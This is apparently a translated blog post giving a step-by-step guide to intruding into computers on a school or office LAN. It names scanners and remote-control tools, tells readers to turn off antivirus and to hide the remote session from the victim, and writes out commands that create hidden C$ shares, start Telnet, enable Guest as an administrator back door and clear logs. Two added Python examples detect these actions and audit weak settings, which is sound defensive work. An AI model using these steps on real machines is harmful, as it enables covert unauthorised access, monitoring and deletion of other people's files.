Details of LAN intrusion detection process

 41175sd3

First of all, note that:
1. The scope of the intrusion is limited to the LAN. On a school network, this can extend to the whole campus network.
2. The only machines that can be intruded on are those with weak passwords (the user name is administrator, etc., and the password is empty), or machines whose account password is known and that have port 139 open with no firewall enabled.

Intrusion tools:
Generally, three tools are used: NTscan abnormal scanner, Recton – D Special Edition, and DameWare Mini Chinese Version 4.5. (Anti-virus software reports the first two tools as viruses. It is recommended to temporarily turn off real-time anti-virus protection and to keep these two tools in an encrypted compressed package to prevent them from being removed.)

Intrusion steps:
1. Use "NTscan Abnormal Scanner": fill in the IP range to be scanned, select "WMI Scan" mode, press "Start", and wait for the scanning results.
2. Use "Recton – D Special Edition".

Select "CMD command" and enter "net share C$=C:" in the "CMD:" field.

This sharing method is highly covert and shares the whole disk. The sharing icon (a hand holding the disk) will not appear on the other host. Then enter "\\IP\C$" in the address bar to open the other host's C disk.

Select "Telnet", enter one of the IPs just scanned in "Remote Host", and start the Telnet service remotely. After it succeeds, select "CMD Options".

Execute the command "net share ipc$", then "net share admin$", and finally "net use \\***.***.***.***\IPC$ /user:administrator", replacing the asterisks with the IP of the host you are intruding on.

3. Use "DameWare Mini Chinese Version 4.5". After installation, click "DameWare Mini Remote Control", choose to activate the product under the "Help" item, and enter the registration information. After successful registration, open the "Remote Connection" window, fill in the IP address in the "Host" field, and click "Settings". Click "Edit" in the "Service Installation Options", then remove "Notification on Connection" from the "Notification Dialog Box", uncheck all "Additional Settings", and remove "Enable User Options Menu" from the "User Options".

After setting, click "Connect" and click "OK" in the pop-up dialog box. After it succeeds, you can control the other person's computer as if operating your own machine. You can also choose to only monitor the other person's screen. Note: if you do not register, a dialog box will pop up on the other host and reveal your identity.

Intrusion procedure supplement:
1. In step 2 above, the remote start of the Telnet service can be completed through "My Computer - Manage - Connect to Another Computer - Enter IP - Services and Applications - Services - Change Telnet to Manual - Start".

2. The Recton-D special version has other functions. In the "Process" item, you can view the processes of the remote host and end them at will. In the "Share" item, you can create a share.

I usually create C$, D$, E$ and F$, with share paths corresponding to C:, D:, etc.

After sharing, enter \\IP\C$ in the address bar to open the other party's C disk, where you can copy and delete the contents at will. In addition, the sharing icon will not be displayed on the other party's disk icon, so it will not be noticed. Afterwards, it is better to turn off sharing.

Finally, select Log to clear all logs without leaving traces. This software will be killed as a virus by anti-virus software, and real-time anti-virus must be turned off when using it.

3. The above sharing can also be done through CMD (Programs - Accessories - Command Prompt).

First run "telnet IP"; after answering "y", enter the user name "administrator" with an empty password. Once logged in, create the C$ share (that is, the C disk): "net share C$=C:"

Share the system folder: "net share c=c:\winnt\system32"; share IPC$: "net share IPC$", etc. Finally, close sharing; to close the C disk share: "net share C$ /del".

4. To facilitate the next intrusion, you can set up a back door: view the users with "net user", activate the guest user with "net user guest /active:yes", change the guest password to poco with "net user guest poco", and raise the guest's privileges to administrator with "net localgroup administrators guest /add".
5. There are many telnet commands (DOS commands), and you can look them up on the Internet. Common commands are: view the files on the D disk: "dir d:"; view the Program Files folder on the C disk: "dir c:\PROGRA~1"; shut down after a 60-second countdown: "shutdown -s -t 60".
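Seen from the monitored host, the share creation, Guest back door and log clearing described above each leave a Security-log record. The following is an added detection example, not part of the original article; it assumes the Windows Vista-and-later event IDs (5142, 4722, 4724, 4732, 1102), that the matching audit policies are enabled, and that events have been exported as dictionaries. The host names, SIDs and records are constructed.

```python
# Added defensive example; the event records below are constructed, not real telemetry.
GUEST_RID = "-501"           # well-known RID suffix of the built-in Guest account
ADMINS_SID = "S-1-5-32-544"  # well-known SID of the local Administrators group
GUEST = "S-1-5-21-1111111111-2222222222-3333333333-501"  # constructed SID

EVENTS = [
    {"host": "WS-12", "id": 5142, "ShareName": r"\\*\C$", "ShareLocalPath": "C:\\"},
    {"host": "WS-12", "id": 4722, "TargetSid": GUEST},
    {"host": "WS-12", "id": 4724, "TargetSid": GUEST},
    {"host": "WS-12", "id": 4732, "TargetSid": ADMINS_SID, "MemberSid": GUEST},
    {"host": "WS-12", "id": 1102, "SubjectUserName": "Administrator"},
    {"host": "WS-30", "id": 5142, "ShareName": r"\\*\Public", "ShareLocalPath": r"D:\Public"},
    {"host": "WS-30", "id": 4722, "TargetSid": GUEST[:-3] + "1004"},
]


def findings(events):
    """Map Security-log events to the actions described in the text."""
    out = []
    for e in events:
        eid, host = e["id"], e["host"]
        if eid == 5142 and e["ShareName"].endswith("$"):
            out.append((host, "hidden-share-created"))      # net share C$=C:
        elif eid == 4722 and e["TargetSid"].endswith(GUEST_RID):
            out.append((host, "guest-enabled"))             # net user guest /active:yes
        elif eid == 4724 and e["TargetSid"].endswith(GUEST_RID):
            out.append((host, "guest-password-reset"))      # net user guest <password>
        elif (eid == 4732 and e["TargetSid"] == ADMINS_SID
              and e["MemberSid"].endswith(GUEST_RID)):
            out.append((host, "guest-added-to-admins"))     # net localgroup ... /add
        elif eid == 1102:
            out.append((host, "security-log-cleared"))      # audit log wiped
    return out


def backdoored_hosts(events):
    """Hosts where Guest was both enabled and made an administrator."""
    seen = {}
    for host, kind in findings(events):
        seen.setdefault(host, set()).add(kind)
    need = {"guest-enabled", "guest-added-to-admins"}
    return sorted(h for h, kinds in seen.items() if need <= kinds)


if __name__ == "__main__":
    for row in findings(EVENTS):
        print(*row)
    print("backdoor pattern on:", backdoored_hosts(EVENTS))
```

Because event 1102 is written by the clearing operation itself, forwarding events to a central collector keeps the earlier records available even after the local log is wiped.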

Supplementary notes:
1. Net use:
(1) "A system error 1326 has occurred. Login failure: unknown user name or wrong password."
In "Control Panel - Folder Options - View - Simple File Sharing" on the remote machine, clear the selection, and then try to connect again. Simple file sharing treats all network connections as guest connections, which cannot access C$ and other administrative shares.

(2) "System error 1327 occurred. Login failure: user account restriction. Possible reasons include not allowing empty passwords, login time restrictions, or mandatory policy restrictions." In "Control Panel - Administrative Tools - Local Security Policy - Security Options - User Rights Assignment" on the remote machine, disable "Users with blank passwords can only log on to the console".

(3) "//IP/c$" reports that the network path cannot be found. In "Network and Dial-up Connections", open "Local Area Connection", select the Internet Protocol (TCP/IP) properties, enter Advanced TCP/IP Settings, select WINS Settings, and there is an item "Enable NetBIOS over TCP/IP"
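Notes (2) and (3) describe two settings that stop the connection when left in their restrictive state. The following added example, not part of the original article, audits them from saved `reg query` output; it assumes the registry values LimitBlankPasswordUse (under Control\Lsa) and NetbiosOptions (per NetBT interface), and the interface GUID and sample output are constructed.

```python
import re

# Constructed `reg query` output for a hypothetical host (not from the page).
TEMPLATE = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    LimitBlankPasswordUse    REG_DWORD    0x%x

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_{00000000-0000-0000-0000-000000000001}
    NetbiosOptions    REG_DWORD    0x%x
"""
WEAK = TEMPLATE % (0, 0)      # blank passwords usable remotely, NetBIOS left at default
HARDENED = TEMPLATE % (1, 2)  # blank passwords console-only, NetBIOS over TCP/IP disabled

VALUE_RE = re.compile(r"^\s+(\S+)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$")


def parse_reg_query(text):
    """Return {key_path: {value_name: int}} for the REG_DWORD values found."""
    result, key = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            result[key] = {}
        else:
            m = VALUE_RE.match(line)
            if m and key:
                result[key][m.group(1)] = int(m.group(2), 16)
    return result


def audit(text):
    """List the settings that leave the host reachable as described in the notes."""
    issues = []
    for key, values in parse_reg_query(text).items():
        # 0 = accounts with a blank password may log on over the network
        if key.endswith(r"\Control\Lsa") and values.get("LimitBlankPasswordUse") == 0:
            issues.append("blank-password accounts may log on over the network")
        # 2 = disabled; 0 follows the DHCP setting, 1 = enabled
        if r"\NetBT\Parameters\Interfaces" in key and values.get("NetbiosOptions") != 2:
            iface = key.rsplit("\\", 1)[1]
            issues.append("NetBIOS over TCP/IP not explicitly disabled on " + iface)
    return issues


if __name__ == "__main__":
    for issue in audit(WEAK):
        print("FINDING:", issue)
```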

Original article. When reprinting, please credit: reprinted from Seven Travelers Blog

Fixed link of this article: https://www.qxzxp.com/4563.html
